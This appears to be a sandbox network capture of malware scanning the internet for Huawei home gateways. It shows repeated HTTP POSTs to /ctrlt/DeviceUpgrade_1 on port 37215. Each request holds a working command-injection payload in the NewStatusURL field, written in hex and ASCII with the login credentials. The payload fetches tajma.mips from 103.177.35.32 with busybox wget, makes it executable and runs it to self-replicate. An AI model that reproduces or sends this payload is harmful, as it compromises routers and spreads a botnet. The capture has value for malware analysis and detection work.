                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        127192.168.2.235428041.162.87.6037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294450998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        128192.168.2.2353518197.165.124.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294506073 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        129192.168.2.2349648197.217.95.6137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294538975 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        130192.168.2.234844241.91.11.14137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294540882 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        131192.168.2.2348170207.14.151.9537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294543028 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        132192.168.2.2348888197.58.206.15037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294595003 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        133192.168.2.234677241.87.72.22337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294605970 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        134192.168.2.233519641.170.174.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294605970 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        135192.168.2.2352488197.22.161.21237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294722080 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        136192.168.2.233764241.169.22.2437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294722080 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
